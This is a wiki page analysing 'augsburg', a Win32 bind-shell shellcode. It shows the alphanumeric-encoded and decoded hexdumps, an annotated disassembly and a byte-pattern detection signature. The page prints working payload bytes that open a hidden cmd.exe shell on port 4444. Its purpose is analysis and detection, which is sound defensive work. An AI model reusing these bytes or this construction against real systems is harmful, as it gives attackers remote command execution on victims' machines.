augsburg Shellcode

Shellcode

raw

hexdump

00000000  eb 03 59 eb 05 e8 f8 ff  ff ff 4f 49 49 49 49 49  |ë.Yë.èøÿÿÿOIIIII|
00000010  49 51 5a 56 54 58 36 33  30 56 58 34 41 30 42 36  |IQZVTX630VX4A0B6|
00000020  48 48 30 42 33 30 42 43  56 58 32 42 44 42 48 34  |HH0B30BCVX2BDBH4|
00000030  41 32 41 44 30 41 44 54  42 44 51 42 30 41 44 41  |A2AD0ADTBDQB0ADA|
00000040  56 58 34 5a 38 42 44 4a  4f 4d 4e 4f 4c 36 4b 4e  |VX4Z8BDJOMNOL6KN|
00000050  4d 54 4a 4e 49 4f 4f 4f  4f 4f 4f 4f 42 36 4b 58  |MTJNIOOOOOOOB6KX|
00000060  4e 36 46 32 46 42 4b 38  45 34 4e 53 4b 48 4e 47  |N6F2FBK8E4NSKHNG|
00000070  45 30 4a 47 41 50 4f 4e  4b 48 4f 34 4a 31 4b 48  |E0JGAPONKHO4J1KH|
00000080  4f 45 42 32 41 50 4b 4e  49 44 4b 38 46 43 4b 48  |OEB2APKNIDK8FCKH|
00000090  41 50 50 4e 41 33 42 4c  49 39 4e 4a 46 48 42 4c  |APPNA3BLI9NJFHBL|
000000a0  46 37 47 30 41 4c 4c 4c  4d 50 41 50 44 4c 4b 4e  |F7G0ALLLMPAPDLKN|
000000b0  46 4f 4b 43 46 55 46 42  4a 32 45 37 45 4e 4b 58  |FOKCFUFBJ2E7ENKX|
000000c0  4f 55 46 52 41 50 4b 4e  48 56 4b 38 4e 50 4b 44  |OUFRAPKNHVK8NPKD|
000000d0  4b 58 4f 45 4e 41 41 30  4b 4e 43 50 4e 52 4b 58  |KXOENAA0KNCPNRKX|
000000e0  49 38 4e 46 46 42 4e 41  41 56 43 4c 41 43 4b 4d  |I8NFFBNAAVCLACKM|
000000f0  46 36 4b 58 43 44 42 43  4b 58 42 54 4e 50 4b 48  |F6KXCDBCKXBTNPKH|
00000100  42 47 4e 31 4d 4a 4b 48  42 34 4a 30 50 55 4a 46  |BGN1MJKHB4J0PUJF|
00000110  50 58 50 34 50 30 4e 4e  42 45 4f 4f 48 4d 48 56  |PXP4P0NNBEOOHMHV|
00000120  43 45 48 36 4a 36 43 33  44 33 4a 46 47 47 43 47  |CEH6J6C3D3JFGGCG|
00000130  44 33 4f 35 46 55 4f 4f  42 4d 4a 46 4b 4c 4d 4e  |D3O5FUOOBMJFKLMN|
00000140  4e 4f 4b 33 42 55 4f 4f  48 4d 4f 35 49 38 45 4e  |NOK3BUOOHMO5I8EN|
00000150  48 56 41 48 4d 4e 4a 30  44 30 45 35 4c 56 44 30  |HVAHMNJ0D0E5LVD0|
00000160  4f 4f 42 4d 4a 46 49 4d  49 30 45 4f 4d 4a 47 55  |OOBMJFIMI0EOMJGU|
00000170  4f 4f 48 4d 43 55 43 45  43 55 43 45 43 35 43 54  |OOHMCUCECUCEC5CT|
00000180  43 55 43 34 43 45 4f 4f  42 4d 48 36 4a 56 41 31  |CUC4CEOOBMH6JVA1|
00000190  4e 45 48 56 43 55 49 38  41 4e 45 59 4a 56 46 4a  |NEHVCUI8ANEYJVFJ|
000001a0  4c 41 42 57 47 4c 47 35  4f 4f 48 4d 4c 36 42 41  |LABWGLG5OOHML6BA|
000001b0  41 45 45 35 4f 4f 42 4d  4a 56 46 4a 4d 4a 50 52  |AEE5OOBMJVFJMJPR|
000001c0  49 4e 47 35 4f 4f 48 4d  43 35 45 55 4f 4f 42 4d  |ING5OOHMC5EUOOBM|
000001d0  4a 56 45 4e 49 44 48 58  49 44 47 55 4f 4f 48 4d  |JVENIDHXIDGUOOHM|
000001e0  42 55 46 55 46 45 45 35  4f 4f 42 4d 43 39 4a 36  |BUFUFEE5OOBMC9J6|
000001f0  47 4e 49 57 48 4c 49 37  47 55 4f 4f 48 4d 45 45  |GNIWHLI7GUOOHMEE|
00000200  4f 4f 42 4d 48 36 4c 36  46 56 48 36 4a 36 43 36  |OOBMH6L6FVH6J6C6|
00000210  4d 56 49 58 45 4e 4c 46  42 55 49 35 49 52 4e 4c  |MVIXENLFBUI5IRNL|
00000220  49 48 47 4e 4c 36 46 44  49 48 44 4e 41 53 42 4c  |IHGNL6FDIHDNASBL|
00000230  43 4f 4c 4a 50 4f 44 34  4d 42 50 4f 44 54 4e 32  |COLJPOD4MBPODTN2|
00000240  43 49 4d 58 4c 47 4a 53  4b 4a 4b 4a 4b 4a 4a 46  |CIMXLGJSKJKJKJJF|
00000250  44 47 50 4f 43 4b 48 41  4f 4f 45 47 46 54 4f 4f  |DGPOCKHAOOEGFTOO|
00000260  48 4d 4b 35 47 55 44 55  41 45 41 35 41 45 4c 46  |HMK5GUDUAEA5AELF|
00000270  41 30 41 45 41 35 45 45  41 35 4f 4f 42 4d 4a 56  |A0AEA5EEA5OOBMJV|
00000280  4d 4a 49 4d 45 30 50 4c  43 45 4f 4f 48 4d 4c 56  |MJIME0PLCEOOHMLV|
00000290  4f 4f 4f 4f 47 53 4f 4f  42 4d 4b 48 47 45 4e 4f  |OOOOGSOOBMKHGENO|
000002a0  43 48 46 4c 46 36 4f 4f  48 4d 44 55 4f 4f 42 4d  |CHFLF6OOHMDUOOBM|
000002b0  4a 56 42 4f 4c 38 46 50  4f 35 43 55 4f 4f 48 4d  |JVBOL8FPO5CUOOHM|
000002c0  4f 4f 42 4d 5a 00                                 |OOBMZ.|
000002c6

unxor'd

00000000  fc 6a eb 4d e8 f9 ff ff  ff 60 8b 6c 24 24 8b 45  |üjëMèùÿÿÿ`.l$$.E|
00000010  3c 8b 7c 05 78 01 ef 8b  4f 18 8b 5f 20 01 eb 49  |<.|.x.ï.O.._ .ëI|
00000020  8b 34 8b 01 ee 31 c0 99  ac 84 c0 74 07 c1 ca 0d  |.4..î1À.¬.Àt.ÁÊ.|
00000030  01 c2 eb f4 3b 54 24 28  75 e5 8b 5f 24 01 eb 66  |.Âëô;T$(uå._$.ëf|
00000040  8b 0c 4b 8b 5f 1c 01 eb  03 2c 8b 89 6c 24 1c 61  |..K._..ë.,..l$.a|
00000050  c3 31 db 64 8b 43 30 8b  40 0c 8b 70 1c ad 8b 40  |Ã1Ûd.C0.@..p.­.@|
00000060  08 5e 68 8e 4e 0e ec 50  ff d6 66 53 66 68 33 32  |.^h.N.ìPÿÖfSfh32|
00000070  68 77 73 32 5f 54 ff d0  68 cb ed fc 3b 50 ff d6  |hws2_TÿÐhËíü;PÿÖ|
00000080  5f 89 e5 66 81 ed 08 02  55 6a 02 ff d0 68 d9 09  |_.åf.í..Uj.ÿÐhÙ.|
00000090  f5 ad 57 ff d6 53 53 53  53 53 43 53 43 53 ff d0  |õ­WÿÖSSSSSCSCSÿÐ|
000000a0  66 68 11 5c 66 53 89 e1  95 68 a4 1a 70 c7 57 ff  |fh.\fS.á.h€.pÇWÿ|
000000b0  d6 6a 10 51 55 ff d0 68  a4 ad 2e e9 57 ff d6 53  |Öj.QUÿÐh€­.éWÿÖS|
000000c0  55 ff d0 68 e5 49 86 49  57 ff d6 50 54 54 55 ff  |UÿÐhåI.IWÿÖPTTUÿ|
000000d0  d0 93 68 e7 79 c6 79 57  ff d6 55 ff d0 66 6a 64  |Ð.hçyÆyWÿÖUÿÐfjd|
000000e0  66 68 63 6d 89 e5 6a 50  59 29 cc 89 e7 6a 44 89  |fhcm.åjPY)Ì.çjD.|
000000f0  e2 31 c0 f3 aa fe 42 2d  fe 42 2c 93 8d 7a 38 ab  |â1ÀóªþB-þB,..z8«|
00000100  ab ab 68 72 fe b3 16 ff  75 44 ff d6 5b 57 52 51  |««hrþ³.ÿuDÿÖ[WRQ|
00000110  51 51 6a 01 51 51 55 51  ff d0 68 ad d9 05 ce 53  |QQj.QQUQÿÐh­Ù.ÎS|
00000120  ff d6 6a ff ff 37 ff d0  8b 57 fc 83 c4 64 ff d6  |ÿÖjÿÿ7ÿÐ.Wü.ÄdÿÖ|
00000130  52 ff d0 68 f0 8a 04 5f  53 ff d6 ff d0 90 90 90  |RÿÐhð.._SÿÖÿÐ...|

Analysis

XOR decoder

Metasploit PexAlphaNumeric encoder: the "raw" hexdump above is the alphanumeric-encoded form, the "unxor'd" hexdump is the decoded payload that the listing below analyses.

	 

unxor'd shellcode

; Annotated (review): decoded payload of the "augsburg" sample, a Metasploit-style
; Win32 bind shell. Structure as visible in this listing:
;   00421A31  entry. The CALL at 00421A35 targets 00421A33, i.e. the second byte of
;             "PUSH -15" (6A EB): the bytes EB 4D there decode as JMP SHORT 00421A82,
;             so the CALL pushes 00421A3A (start of the resolver) and runs on at 00421A82.
;   00421A3A  export resolver: in = (module base, ROR-13 hash of the name) on the
;             stack, out = EAX = function address; the two args are NOT popped.
;   00421A82  main body: locate kernel32, LoadLibraryA("ws2_32"), WSAStartup,
;             WSASocketA, bind(port 4444), listen, accept, closesocket(listener),
;             CreateProcessA("cmd") with the client socket as stdin/stdout/stderr,
;             WaitForSingleObject, closesocket(client), SetUnhandledExceptionFilter.
; Hash labels added below for calls the original listing left unlabelled
; (WSAStartup, listen) follow the Metasploit ROR-13 table - confirm before relying on them.
; Detection notes: the port is the 16-bit immediate at 00421AD1 (the "\x68(..)" group
; of the pattern further down); the child cmd.exe is created with
; dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW, wShowWindow = SW_HIDE and all
; three std handles equal to the socket.
00421A31   FC               CLD                                      ; DF=0: LODS/STOS below walk forwards
00421A32   6A EB            PUSH -15                                 ; 6A EB - the EB is also the opcode of a JMP SHORT (see header)
00421A34   4D               DEC EBP                                  ; 4D - rel8 of that JMP; never executed as DEC
00421A35   E8 F9FFFFFF      CALL leimbach.00421A33                   ; pushes 00421A3A (resolver) and lands on the JMP to 00421A82
00421A3A   60               PUSHAD                                   ; resolver entry; after PUSHAD: [ESP+24]=module base, [ESP+28]=hash
00421A3B   8B6C24 24        MOV EBP,DWORD PTR SS:[ESP+24]            ; EBP = module base
00421A3F   8B45 3C          MOV EAX,DWORD PTR SS:[EBP+3C]            ; e_lfanew
00421A42   8B7C05 78        MOV EDI,DWORD PTR SS:[EBP+EAX+78]        ; export directory RVA (data directory 0 at +0x78)
00421A46   01EF             ADD EDI,EBP                              ; EDI = IMAGE_EXPORT_DIRECTORY
00421A48   8B4F 18          MOV ECX,DWORD PTR DS:[EDI+18]            ; NumberOfNames
00421A4B   8B5F 20          MOV EBX,DWORD PTR DS:[EDI+20]            ; AddressOfNames (RVA)
00421A4E   01EB             ADD EBX,EBP
00421A50   49               DEC ECX                                  ; walk the name table from the end
00421A51   8B348B           MOV ESI,DWORD PTR DS:[EBX+ECX*4]         ; ESI = name RVA
00421A54   01EE             ADD ESI,EBP
00421A56   31C0             XOR EAX,EAX
00421A58   99               CDQ                                      ; EDX = 0: hash accumulator
00421A59   AC               LODS BYTE PTR DS:[ESI]                   ; next byte of the export name
00421A5A   84C0             TEST AL,AL
00421A5C   74 07            JE SHORT leimbach.00421A65               ; NUL: name done
00421A5E   C1CA 0D          ROR EDX,0D                               ; hash = ROR(hash,13) + byte
00421A61   01C2             ADD EDX,EAX
00421A63  ^EB F4            JMP SHORT leimbach.00421A59
00421A65   3B5424 28        CMP EDX,DWORD PTR SS:[ESP+28]            ; equals the requested hash?
00421A69  ^75 E5            JNZ SHORT leimbach.00421A50              ; no: next name; nothing stops ECX from wrapping below 0
00421A6B   8B5F 24          MOV EBX,DWORD PTR DS:[EDI+24]            ; AddressOfNameOrdinals
00421A6E   01EB             ADD EBX,EBP
00421A70   66:8B0C4B        MOV CX,WORD PTR DS:[EBX+ECX*2]           ; CX = ordinal of the matched name
00421A74   8B5F 1C          MOV EBX,DWORD PTR DS:[EDI+1C]            ; AddressOfFunctions
00421A77   01EB             ADD EBX,EBP
00421A79   032C8B           ADD EBP,DWORD PTR DS:[EBX+ECX*4]         ; EBP = base + function RVA
00421A7C   896C24 1C        MOV DWORD PTR SS:[ESP+1C],EBP            ; saved-EAX slot -> POPAD returns it in EAX
00421A80   61               POPAD
00421A81   C3               RETN                                     ; the two args stay on the stack (callers pop or reuse them)
00421A82   31DB             XOR EBX,EBX                              ; main body (reached via the JMP at 00421A33)
00421A84   64:8B43 30       MOV EAX,DWORD PTR FS:[EBX+30]            ; PEB
00421A88   8B40 0C          MOV EAX,DWORD PTR DS:[EAX+C]             ; PEB->Ldr
00421A8B   8B70 1C          MOV ESI,DWORD PTR DS:[EAX+1C]            ; InInitializationOrderModuleList.Flink
00421A8E   AD               LODS DWORD PTR DS:[ESI]                  ; EAX = second entry
00421A8F   8B40 08          MOV EAX,DWORD PTR DS:[EAX+8]             ; its DllBase: kernel32 on XP/2003; NOTE(review): not guaranteed on later Windows
00421A92   5E               POP ESI                                  ; ESI = 00421A3A (resolver)
00421A93   68 8E4E0EEC      PUSH EC0E4E8E                            ; hash(LoadLibraryA)
00421A98   50               PUSH EAX                                 ; kernel32 base
00421A99   FFD6             CALL ESI                                 ; EAX = LoadLibraryA
00421A9B   66:53            PUSH BX                                  ; BX = 0: terminator
00421A9D   66:68 3332       PUSH 3233                                ; "32"
00421AA1   68 7773325F      PUSH 5F327377                            ; "ws2_" -> "ws2_32\0" on the stack
00421AA6   54               PUSH ESP                                 ; lpLibFileName
00421AA7   FFD0             CALL EAX                                 ; call LoadLibraryA("ws2_32"); EAX = ws2_32 base
00421AA9   68 CBEDFC3B      PUSH 3BFCEDCB                            ; hash(WSAStartup) - label added on review, see header
00421AAE   50               PUSH EAX                                 ; ws2_32 base
00421AAF   FFD6             CALL ESI                                 ; EAX = WSAStartup
00421AB1   5F               POP EDI                                  ; EDI = ws2_32 base (left on the stack by the resolver)
00421AB2   89E5             MOV EBP,ESP
00421AB4   66:81ED 0802     SUB BP,208                               ; EBP = ESP-0x208: WSADATA buffer below ESP (16-bit sub; assumes no borrow)
00421AB9   55               PUSH EBP                                 ; lpWSAData
00421ABA   6A 02            PUSH 2                                   ; wVersionRequested = 2
00421ABC   FFD0             CALL EAX                                 ; call WSAStartup
00421ABE   68 D909F5AD      PUSH ADF509D9                            ; hash(WSASocketA)
00421AC3   57               PUSH EDI                                 ; ws2_32 base
00421AC4   FFD6             CALL ESI                                 ; EAX = WSASocketA
00421AC6   53               PUSH EBX                                 ; extra 0 below the six args; survives the call and becomes sin_addr = 0
00421AC7   53               PUSH EBX                                 ; dwFlags = 0
00421AC8   53               PUSH EBX                                 ; g = 0
00421AC9   53               PUSH EBX                                 ; lpProtocolInfo = NULL
00421ACA   53               PUSH EBX                                 ; protocol = 0
00421ACB   43               INC EBX
00421ACC   53               PUSH EBX                                 ; type = 1 (SOCK_STREAM)
00421ACD   43               INC EBX
00421ACE   53               PUSH EBX                                 ; af = 2 (AF_INET)
00421ACF   FFD0             CALL EAX                                 ; call WSASocketA; EAX = listening socket
00421AD1   66:68 115C       PUSH 5C11                                ; port 4444: sin_port = 0x115C (network order); captured by \x68(..) in the pattern below
00421AD5   66:53            PUSH BX                                  ; sin_family = 2 (AF_INET); sin_addr is the leftover 0 pushed at 00421AC6
00421AD7   89E1             MOV ECX,ESP                              ; ECX = &sockaddr_in
00421AD9   95               XCHG EAX,EBP                             ; EBP = listening socket
00421ADA   68 A41A70C7      PUSH C7701AA4                            ; hash(bind)
00421ADF   57               PUSH EDI                                 ; ws2_32 base
00421AE0   FFD6             CALL ESI                                 ; EAX = bind
00421AE2   6A 10            PUSH 10                                  ; namelen = 16
00421AE4   51               PUSH ECX                                 ; &sockaddr_in
00421AE5   55               PUSH EBP                                 ; listening socket
00421AE6   FFD0             CALL EAX                                 ; call bind
00421AE8   68 A4AD2EE9      PUSH E92EADA4                            ; hash(listen) - label added on review, see header
00421AED   57               PUSH EDI                                 ; ws2_32 base
00421AEE   FFD6             CALL ESI                                 ; EAX = listen
00421AF0   53               PUSH EBX                                 ; backlog = 2 (EBX is still 2)
00421AF1   55               PUSH EBP                                 ; listening socket
00421AF2   FFD0             CALL EAX                                 ; call listen
00421AF4   68 E5498649      PUSH 498649E5                            ; hash(accept)
00421AF9   57               PUSH EDI                                 ; ws2_32 base
00421AFA   FFD6             CALL ESI                                 ; EAX = accept
00421AFC   50               PUSH EAX                                 ; scratch dword, reused as addrlen
00421AFD   54               PUSH ESP                                 ; &addrlen
00421AFE   54               PUSH ESP                                 ; addr (overwrites stale stack slots above)
00421AFF   55               PUSH EBP                                 ; listening socket
00421B00   FFD0             CALL EAX                                 ; call accept; EAX = client socket
00421B02   93               XCHG EAX,EBX                             ; EBX = client socket
00421B03   68 E779C679      PUSH 79C679E7                            ; hash(closesocket) - this (base,hash) pair is reused at 00421B5F
00421B08   57               PUSH EDI                                 ; ws2_32 base
00421B09   FFD6             CALL ESI                                 ; EAX = closesocket
00421B0B   55               PUSH EBP                                 ; listening socket
00421B0C   FFD0             CALL EAX                                 ; call closesocket (listener)
00421B0E   66:6A 64         PUSH 64                                  ; "d\0"
00421B11   66:68 636D       PUSH 6D63                                ; "cm" -> "cmd\0"
00421B15   89E5             MOV EBP,ESP                              ; EBP = "cmd"
00421B17   6A 50            PUSH 50                                  ; 0x50 = rest of STARTUPINFO (0x40) + PROCESS_INFORMATION (0x10)
00421B19   59               POP ECX                                  ; ECX = 0x50
00421B1A   29CC             SUB ESP,ECX                              ; reserve it
00421B1C   89E7             MOV EDI,ESP                              ; EDI = start of the region
00421B1E   6A 44            PUSH 44                                  ; STARTUPINFO.cb = 0x44
00421B20   89E2             MOV EDX,ESP                              ; EDX = &STARTUPINFO
00421B22   31C0             XOR EAX,EAX                              ; fill byte 0
00421B24   F3:AA            REP STOS BYTE PTR ES:[EDI]               ; zero the 0x50 bytes; leaves ECX = 0, reused as NULL below
00421B26   FE42 2D          INC BYTE PTR DS:[EDX+2D]                 ; dwFlags |= 0x100 (STARTF_USESTDHANDLES)
00421B29   FE42 2C          INC BYTE PTR DS:[EDX+2C]                 ; dwFlags |= 0x001 (STARTF_USESHOWWINDOW); wShowWindow stays 0 = SW_HIDE
00421B2C   93               XCHG EAX,EBX                             ; EAX = client socket, EBX = 0
00421B2D   8D7A 38          LEA EDI,DWORD PTR DS:[EDX+38]            ; &hStdInput
00421B30   AB               STOS DWORD PTR ES:[EDI]                  ; hStdInput = socket
00421B31   AB               STOS DWORD PTR ES:[EDI]                  ; hStdOutput = socket
00421B32   AB               STOS DWORD PTR ES:[EDI]                  ; hStdError = socket; EDI = EDX+0x44 = &PROCESS_INFORMATION
00421B33   68 72FEB316      PUSH 16B3FE72                            ; hash(CreateProcessA)
00421B38   FF75 44          PUSH DWORD PTR SS:[EBP+44]               ; kernel32 base, still on the stack from 00421A98 (EBP+44 = that slot)
00421B3B   FFD6             CALL ESI                                 ; EAX = CreateProcessA
00421B3D   5B               POP EBX                                  ; EBX = kernel32 base
00421B3E   57               PUSH EDI                                 ; lpProcessInformation
00421B3F   52               PUSH EDX                                 ; lpStartupInfo
00421B40   51               PUSH ECX                                 ; lpCurrentDirectory = NULL (ECX = 0)
00421B41   51               PUSH ECX                                 ; lpEnvironment = NULL
00421B42   51               PUSH ECX                                 ; dwCreationFlags = 0
00421B43   6A 01            PUSH 1                                   ; bInheritHandles = TRUE
00421B45   51               PUSH ECX                                 ; lpThreadAttributes = NULL
00421B46   51               PUSH ECX                                 ; lpProcessAttributes = NULL
00421B47   55               PUSH EBP                                 ; lpCommandLine = "cmd"
00421B48   51               PUSH ECX                                 ; lpApplicationName = NULL
00421B49   FFD0             CALL EAX                                 ; call CreateProcessA: cmd.exe inherits the socket as stdin/stdout/stderr
00421B4B   68 ADD905CE      PUSH CE05D9AD                            ; hash(WaitForSingleObject)
00421B50   53               PUSH EBX                                 ; kernel32 base
00421B51   FFD6             CALL ESI                                 ; EAX = WaitForSingleObject
00421B53   6A FF            PUSH -1                                  ; INFINITE
00421B55   FF37             PUSH DWORD PTR DS:[EDI]                  ; PROCESS_INFORMATION.hProcess
00421B57   FFD0             CALL EAX                                 ; call WaitForSingleObject: blocks until cmd.exe exits
00421B59   8B57 FC          MOV EDX,DWORD PTR DS:[EDI-4]             ; STARTUPINFO.hStdError = client socket
00421B5C   83C4 64          ADD ESP,64                               ; 3 dwords + 0x54 struct bytes + "cmd": ESP -> (ws2_32 base, hash(closesocket)) pushed at 00421B03/00421B08
00421B5F   FFD6             CALL ESI                                 ; EAX = closesocket, resolved from that leftover pair
00421B61   52               PUSH EDX                                 ; client socket
00421B62   FFD0             CALL EAX                                 ; call closesocket (client)
00421B64   68 F08A045F      PUSH 5F048AF0                            ; hash(SetUnhandledExceptionFilter)
00421B69   53               PUSH EBX                                 ; kernel32 base
00421B6A   FFD6             CALL ESI                                 ; EAX = SetUnhandledExceptionFilter
00421B6C   FFD0             CALL EAX                                 ; call SetUnhandledExceptionFilter(arg = kernel32 base left on the stack); exit path - presumably the next fault ends the process

shellcode patterns

bindshell

bindshell::augsburg
{
	pattern
	"\\x6A\\xEB\\x4D\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x7C\\x05\\x78\\x01\\xEF\\x8B\\x4F\\x18\\x8B\\x5F\\x20\\x01\\xEB\\x49\\x8B"
	"\\x34\\x8B\\x01\\xEE\\x31\\xC0\\x99\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x28\\x75\\xE5\\x8B\\x5F\\x24\\x01\\xEB\\x66\\x8B"
	"\\x0C\\x4B\\x8B\\x5F\\x1C\\x01\\xEB\\x03\\x2C\\x8B\\x89\\x6C\\x24\\x1C\\x61\\xC3\\x31\\xDB\\x64\\x8B\\x43\\x30\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08"
	"\\x5E\\x68\\x8E\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\xD0\\x68\\xCB\\xED\\xFC\\x3B\\x50\\xFF\\xD6\\x5F"
	"\\x89\\xE5\\x66\\x81\\xED\\x08\\x02\\x55\\x6A\\x02\\xFF\\xD0\\x68\\xD9\\x09\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xFF\\xD0\\x66"
	"\\x68(..)\\x66\\x53\\x89\\xE1\\x95\\x68\\xA4\\x1A\\x70\\xC7\\x57\\xFF\\xD6\\x6A\\x10\\x51\\x55\\xFF\\xD0\\x68\\xA4\\xAD\\x2E\\xE9\\x57\\xFF\\xD6\\x53\\x55"
	"\\xFF\\xD0\\x68\\xE5\\x49\\x86\\x49\\x57\\xFF\\xD6\\x50\\x54\\x54\\x55\\xFF\\xD0\\x93\\x68\\xE7\\x79\\xC6\\x79\\x57\\xFF\\xD6\\x55\\xFF\\xD0\\x66\\x6A\\x64\\x66"
	"\\x68\\x63\\x6D\\x89\\xE5\\x6A\\x50\\x59\\x29\\xCC\\x89\\xE7\\x6A\\x44\\x89\\xE2\\x31\\xC0\\xF3\\xAA\\xFE\\x42\\x2D\\xFE\\x42\\x2C\\x93\\x8D\\x7A\\x38\\xAB\\xAB"
	"\\xAB\\x68\\x72\\xFE\\xB3\\x16\\xFF\\x75\\x44\\xFF\\xD6\\x5B\\x57\\x52\\x51\\x51\\x51\\x6A\\x01\\x51\\x51\\x55\\x51\\xFF\\xD0\\x68\\xAD\\xD9\\x05\\xCE\\x53\\xFF"
	"\\xD6\\x6A\\xFF\\xFF\\x37\\xFF\\xD0\\x8B\\x57\\xFC\\x83\\xC4\\x64\\xFF\\xD6\\x52\\xFF\\xD0\\x68\\xF0\\x8A\\x04\\x5F\\x53\\xFF\\xD6\\xFF\\xD0";
	mapping (none,port);
};
 
 
csni/shellcodes/augsburg.txt · Last modified: 2006/04/19 01:08
 